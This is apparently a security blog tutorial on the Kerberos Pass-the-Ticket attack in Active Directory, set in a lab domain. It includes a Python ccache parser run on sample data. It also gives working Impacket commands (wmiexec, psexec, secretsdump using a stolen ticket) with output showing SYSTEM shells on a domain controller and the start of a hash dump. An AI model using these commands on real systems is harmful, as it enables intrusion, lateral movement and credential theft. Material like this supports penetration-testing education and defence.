June 2, 2026
Active Directory Attacks — Pass The Ticket
Osec
Pass-the-Ticket is a post-exploitation technique in Active Directory where an attacker uses a stolen Kerberos ticket (usually a TGT or a TGS/service ticket) to authenticate as a user without knowing their password or NTLM hash.
Instead of stealing credentials, you steal the authentication token itself (the Kerberos ticket) and reuse it. The ticket stays valid until its end time (10 hours by default for a TGT in Active Directory), even if the user's password is changed in the meantime, so everything below works for as long as the ticket lives.
Attack
- Obtain a Kerberos ticket (TGT or TGS) for the target user.
- Load/inject it into your session.
- Authenticate to services in the Active Directory environment without supplying any credentials.
For the demo, let's say you obtained a Kerberos ticket for the user BRoss (e.g. via an overpass-the-hash attack, which on Linux leaves you with a .ccache file). If the ticket came from Windows tooling as a .kirbi, convert it first with impacket-ticketConverter.
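Before pointing KRB5CCNAME at a cache, it is worth looking at what is actually inside it: whether it holds a TGT (usable against any service in the realm) or only a service ticket for one SPN, and whether it has already expired. The block below is an added example, not code from the original post or from Impacket. It parses the MIT ccache version 4 format that Impacket and the MIT Kerberos tools use, and runs against a sample cache constructed inline: the principal names are the ones from this page's lab, the ticket bytes are filler rather than real encrypted ticket material, and "now" is a fixed constructed timestamp so the result is deterministic.

```python
# Added example, not code from the original post or from Impacket: a minimal
# reader/writer for the MIT ccache v4 format that KRB5CCNAME points at. It lists
# what a "-k -no-pass" run will present: the default principal and, per cached
# ticket, client/server principal, TGT vs service ticket, and whether it is still
# valid. The sample cache is constructed inline; its ticket bytes are filler.
import struct

def _cstr(buf, off):
    """Counted octet string: uint32 big-endian length, then the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def _principal(buf, off):
    """uint32 name_type, uint32 component count, realm, then the components."""
    _name_type, ncomp = struct.unpack_from(">II", buf, off)
    realm, off = _cstr(buf, off + 8)
    comps = []
    for _ in range(ncomp):
        c, off = _cstr(buf, off)
        comps.append(c.decode())
    return "/".join(comps) + "@" + realm.decode(), off

def parse_ccache(buf):
    """Return (default principal, list of credential dicts) from a v4 ccache."""
    if buf[:2] != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    (hlen,) = struct.unpack_from(">H", buf, 2)
    default, off = _principal(buf, 4 + hlen)          # 4 + hlen skips the header tags
    creds = []
    while off < len(buf):
        client, off = _principal(buf, off)
        server, off = _principal(buf, off)
        (keytype,) = struct.unpack_from(">H", buf, off)
        _session_key, off = _cstr(buf, off + 2)       # secret material: never log it
        _authtime, starttime, endtime, renew_till = struct.unpack_from(">IIII", buf, off)
        (flags,) = struct.unpack_from(">I", buf, off + 17)   # after 16 bytes of times + is_skey
        off += 21
        for _ in range(2):                            # addresses, then authdata: count, (type, data)...
            (n,) = struct.unpack_from(">I", buf, off)
            off += 4
            for _ in range(n):
                _, off = _cstr(buf, off + 2)
        ticket, off = _cstr(buf, off)
        _second_ticket, off = _cstr(buf, off)
        creds.append({"client": client, "server": server, "keytype": keytype,
                      "starttime": starttime, "endtime": endtime, "renew_till": renew_till,
                      "flags": flags, "ticket_len": len(ticket)})
    return default, creds

def is_tgt(cred):
    """A TGT is a ticket for the KDC's own service principal, krbtgt/REALM."""
    return cred["server"].startswith("krbtgt/")

def usable(cred, now):
    """Impacket presents whatever is cached; the KDC or service rejects it outside this window."""
    return cred["starttime"] <= now < cred["endtime"]

def _wstr(b):  # writer helpers below are used only to build the sample cache
    return struct.pack(">I", len(b)) + b

def _wprinc(name, name_type=1):
    comps, realm = name.rsplit("@", 1)
    parts = comps.split("/")
    return (struct.pack(">II", name_type, len(parts)) + _wstr(realm.encode())
            + b"".join(_wstr(p.encode()) for p in parts))

def build_ccache(default, creds):
    out = b"\x05\x04" + struct.pack(">H", 12) + struct.pack(">HHii", 1, 8, 0, 0)  # DeltaTime header tag
    out += _wprinc(default)
    for c in creds:
        out += _wprinc(c["client"]) + _wprinc(c["server"])
        out += struct.pack(">H", 18) + _wstr(c["key"])             # keytype 18 = aes256-cts-hmac-sha1-96
        out += struct.pack(">IIII", c["starttime"], c["starttime"], c["endtime"], c["renew_till"])
        out += b"\x00" + struct.pack(">I", c["flags"])             # is_skey = 0, ticket flags
        out += struct.pack(">II", 0, 0)                            # no addresses, no authdata
        out += _wstr(c["ticket"]) + _wstr(b"")                     # ticket, second_ticket
    return out

NOW = 1700000000   # constructed "current time", so the result is deterministic
SAMPLE = build_ccache("BRoss@INLANEFREIGHT.LOCAL", [
    {"client": "BRoss@INLANEFREIGHT.LOCAL", "server": "krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL",
     "key": b"\x11" * 32, "starttime": NOW - 3600, "endtime": NOW + 32400, "renew_till": NOW + 604800,
     "flags": 0x40E10000, "ticket": b"\x61" + bytes(range(64))},   # 10h TGT issued an hour ago
    {"client": "BRoss@INLANEFREIGHT.LOCAL", "server": "cifs/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL",
     "key": b"\x22" * 32, "starttime": NOW - 7200, "endtime": NOW - 60, "renew_till": NOW - 60,
     "flags": 0x40A10000, "ticket": b"\x61" + bytes(range(64))},   # service ticket, already expired
])

def summarize(buf, now=NOW):
    """One line per cached ticket: what to check before running wmiexec/psexec with -k."""
    default, creds = parse_ccache(buf)
    rows = []
    for c in creds:
        kind = "TGT" if is_tgt(c) else "TGS"
        left = c["endtime"] - now
        state = f"valid, {left}s left" if usable(c, now) else f"EXPIRED {-left}s ago"
        rows.append(f"{kind} {c['client']} -> {c['server']} [{state}]")
    return default, rows

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE)[1]))
```

With KRB5CCNAME set, `klist` on the attacking Linux box shows the same information for a real cache (principal, service principal and expiry per ticket) and is the quick check to run before the Impacket commands; the parser above is there to show what that check is reading. A cache whose only entry is an expired TGT will still be presented by `-k -no-pass`, and the KDC will reject the TGS-REQ, so check the end time before blaming the tooling.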
Tell Linux to use that ticket (point the Kerberos credential cache at it):
export KRB5CCNAME=/tmp/BRoss.ccache
Use the ticket. Impacket's -k flag makes each tool authenticate with Kerberos from that cache, and -no-pass stops it prompting for a password. Give the target as its FQDN rather than an IP address: the service ticket is requested for the SPN of that exact host name, and Kerberos authentication to an IP will fail.
wmiexec:
impacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\bross
psexec:
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file jiWPllnH.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service OydR on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service OydR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
psexec comes back as SYSTEM rather than BRoss because it uploads a binary to ADMIN$ and starts it as a service; that only works because BRoss has administrative rights on the DC. With a ticket for an unprivileged user the Kerberos authentication would still succeed, but ADMIN$ would not be writable and no service would be created. Note that this path leaves a service creation and a dropped executable on the target, which wmiexec does not.
secretsdump:
impacket-secretsdump -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...
Follow me on X : https://x.com/osec403